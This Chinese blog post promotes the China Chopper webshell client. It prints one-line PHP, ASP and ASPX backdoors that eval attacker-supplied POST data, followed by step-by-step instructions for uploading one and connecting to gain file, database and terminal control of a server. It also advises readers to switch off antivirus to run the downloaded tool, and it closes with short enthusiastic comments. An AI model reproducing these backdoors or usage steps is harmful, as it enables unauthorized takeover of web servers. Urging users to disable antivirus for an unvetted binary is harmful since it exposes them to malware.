中国菜刀,一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,小巧又实用!不过被不法分子利用到,就是一个黑站的利器了。
- 1.中国菜刀支持的服务端脚本:PHP、ASP;
- 2.主要功能有:文件管理(有足够的权限时候可以管理整个磁盘/文件系统),数据库管理,虚拟终端。
- 3.菜刀的工作原理是:利用上传到服务器的一句话脚本再通过一些添加配置就可以工作了。
第一步:我们首先要新建一个php文件,文件名随意取,然后写入一句代码:<?php eval($_POST[‘cmd’]); ?> ;eval()这个函数大家并不陌生吧,就是把里面的字符串作为PHP代码执行。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。如果使用的是phpstudy,就下载到WWW目录里,这里只演示了如何创建一句话木马的代码,并没有上传到根目录。
PHP一句话木马:<?php @eval($_POST[‘cmd’]);?>
ASP一句话木马:<%eval request[‘cmd’]%>
ASPX一句话木马:<%@ Page Language=”Jscript”%><%eval(Request.Item[“cmd”],”unsafe”);%>
眼尖的童鞋已经看到了三个里面都带有cmd这个单词,没错这个就是密码,大家可以自行修改为自己使用的密码。
第二步:打开菜刀这个软件,进入如下界面,右键点击“添加”;如下图:
第三步:此时会弹出一个添加shell的对话框,由图一看出我的文件名为“yjh.php”,所以这里的地址填为:http://localhost/yjh.php 。地址后面的小框框里面的“cmd”就是你的“口令”,也就是<?php eval($_POST[‘cmd’]); ?> 这里的“cmd”。下面配置项如果你知道用户名密码就填,不知道,不填,也不会影响文件管理和虚拟终端这两个功能,只是不能查看数据库了。
最后:点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈…大功告成!!
效果图展示(可以控制对方电脑硬盘):
在下面附上菜刀的下载链接,评论后可下载
最后说明一下:此软件打开时杀毒软件可能会报毒的,有虚拟机条件最好用虚拟机,若没有虚拟机的小伙伴也不用担心,关掉自己的杀毒软件就可以了,本人已亲自使用多次,可放心使用。
好东西
11
666
找了好多地方,希望~
好东西